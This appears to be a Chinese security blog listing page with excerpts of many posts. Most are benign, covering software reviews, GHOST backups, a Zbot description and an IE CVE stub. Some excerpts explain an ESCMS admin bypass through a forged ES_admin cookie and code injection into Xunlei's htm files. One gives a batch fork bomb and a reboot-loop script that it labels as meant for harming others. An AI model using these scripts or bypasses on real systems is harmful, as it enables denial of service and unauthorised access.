版本:ESCMS V1.0 SP1 Build 1125
后台登陆验证是通过admin/check.asp实现的,看代码
<%
if Request.cookies(CookiesKey)("ES_admin")="" then
''注意这里哦,他是通过COOKIE验证ES_admin是否为空,我们可以伪造一个值,叫他不为空
...
- 添加新评论
- 阅读次数:
当我们使用迅雷下载东西的时候,会调用我们安装迅雷后一个htm文件,去激活htm文件里的一些代码,
把我们所下载东西添加到列表当中。
所对应的htm文件有2处一处是C:\Program Files\Thunder Network\Thunder\Program\geturl.htm
一处是C:\Program Files\Thunder Network\Thunder\Program\getAllurl.htm
如果我们想把我们想要的代码添加进去执行了?
...
- 添加新评论
- 阅读次数:
Bugtraq ID: 38463
Class: Boundary Condition Error
CVE: CVE-2010-0483
Remote: Yes
Local: No
Published: Feb 26 2010 12:00AM
Updated: Mar 01 2010 11:02PM
Credit: Maurycy Prodeus
Vulnerable: Microsoft Internet Explorer 7.0.5730 .11
...
- 添加新评论
- 阅读次数:
运行环境:Win Nt/2000/Xp/2003
软件授权:免费软件
软件大小:35680K
一款采用“动态仿真反病毒专家系统”、“程序行为监控并举”、“自动准确判定新病毒”、“自动提取特征码实现多重防护”和“可视化显示监控信息”五大核心技术作为强大防护的后盾的防御软件。
功能上包括五大模块。其一,“安全防护与策略” 包括“可疑程序诊断”、“漏洞扫描”、“程序行为实时监控策略”等七个子模块,使用非常“傻瓜化”。点击“可疑程序诊断”,微点会扫描系统中是否存在可疑的有害程序,速度很快。“漏洞扫描”能够自动探测出操作系统的漏洞,并详细给出其说明及下载链接;其二,“网络分析” 包括“进程综合信息”、“系统自启动信息”、“模块/进程”等六个子模块。“进程综合信息”能够详细的列出当前活动的各个进程,并且将它们分成“windows系统”、“应用软件”、“其他软件”三类。选中某个进程后,微点还给出了其对应的绝对路径,这对于用户分析木马进程非常有帮助;其三,“网络分析” 包括“进程网络信息”、“IP流量图”等五个子模块,“进程网络信息”提供了“进程名称”、“流量比率%”、“本地端口”、“远程IP”等非常详细的信息,用户可以方便地分析某个可疑程序(特别是木马)、抓住其背后的黑手;最后的“安全与系统日志” 分类很详细,包括“病毒日志”、“木马日志”、“溢出日志”等八个子模块,通过看其记录,用户能够得到像“病毒文件创建者”、“木马进程名”、“被溢出进程名”等资讯。
...
- 添加新评论
- 阅读次数:
游戏设计目的:通过本游戏,提高网络技术人员对网络的理解,增强网络管理者的安全意识。
游戏介绍:某服务器有个文档,你需要利用提示获取其中的内容,在本帖帖出来。
游戏目标:3707788881
telnet目标服务器,获得administrator桌面上的文档信息。 提示:用户名是admin,密码是370afbdb25e60073。需md5解密。 telnet后身份认证较慢,请耐心等候。
比赛圆满结束,总结一下吧,自上午开赛到下午1点半,大约有40-50人telnet上了服务器,有的朋友看到开了3389,加了系统用户,想登陆上系统,有的共享了服务器的c盘,还有朋友看到1433开了,试图暴力破解sa密码,次数多大32000次,呵呵。大家就不要再尝试登陆了,密码都改了。本次比赛反响不错,我本人也学到了不少知识。详见:http://bbs.51cto.com/thread-659015-1.html
IP地址计算方法:
221*256^3+0*256^2+94*256+81=3707788881
- 添加新评论
- 阅读次数:
2010年1月,英特尔正式发布了采用32纳米制程工艺的酷睿i7、酷睿i5以及酷睿i3处理器,2月25日,英特尔在中国发布了全新酷睿博锐平台。这些带着全新漂亮vPro LOGO的全新i系列酷睿博锐处理器就是英特尔试图寻找到的更加“智能”在商用客户端上的实现形式。
英特尔全新i系列酷睿博锐处理器以i开头,或许是取了英文单词“intelligence”的第一个字母。“intelligence”代表“智能、智慧、理解力”的意思。而在英特尔的工程师看来,“智能”是可以通过更小、更快、更高能效、更高安全性和高可管理性的处理器来实现的。
...
- 添加新评论
- 阅读次数:
对于我们电脑的机密资料,为了不让别人随便查看,通常的办法就是“加密”。EZ Document Safe就是一款绿色软件,采用高级的加密机制,能够将文件放到加密的数据库中,便于文件的集中管理与携带的加密工具。
版本号: 1.82
文件大小: 4220K
软件类型: 文件管理/安全工具
系统平台: Win2000/Xp/2003
一、功能特点
1、创建加密数据库
在主窗口中点击“database | new database”按钮,在弹出的向导窗口“location”栏中点击“浏览”按钮,选择新建加密数据库的路径。接着定义数据库的别名、大小(默认下是60MB)、密码,最终完成创建。也可以使用优盘作为打开加密数据库的密钥,将密钥文件写入优盘。
...
- 添加新评论
- 阅读次数:
收集:X.DW's blog
链接:http://hi.baidu.com/hkxdw
第一个:让别人内存OVER(逼他重启)
@echo off
start cmd
%0
就这3行了
第二个:让对方重启指定次数(害人专用)
@echo off
if not exist c:\1.txt echo. >c:\1.txt & goto err1
...
- 添加新评论
- 阅读次数:
GHOST是一个硬盘拷贝软件,它的原理就是将整个硬盘或者某些分区作映像保存,也可以将文件还原到硬盘上,恢复到硬盘前的状态。它具有安全、快速、保密性强、压缩率高、兼容性好等特点,特别适合电脑新手和担心操作麻烦的人使用。应用GHOST最核心的问题就是保证自己的硬盘映像是无毒的,最优化的且最适合自己的,如何才能做到这点呢?下面的介绍帮您解决这个问题。
1. 在我们接手一台新电脑后,首先要找一张干净无毒的系统安装盘,将操作系统、硬件驱动程序安装完毕,从源头防止病毒入侵(若无现成的驱动程序需下载,待第2,3步完成后再执行);
...
- 添加新评论
- 阅读次数:
病毒名称:Win32.Zbot.WY
疯狂性:低
破坏性:低
普及度:低
病毒描述
Win32/Zbot.WY 属于Zbot/Kollah病毒家族,它会尝试从被感染机器上盗窃敏感信息,还会连接C&C 服务器。
- 添加新评论
- 阅读次数: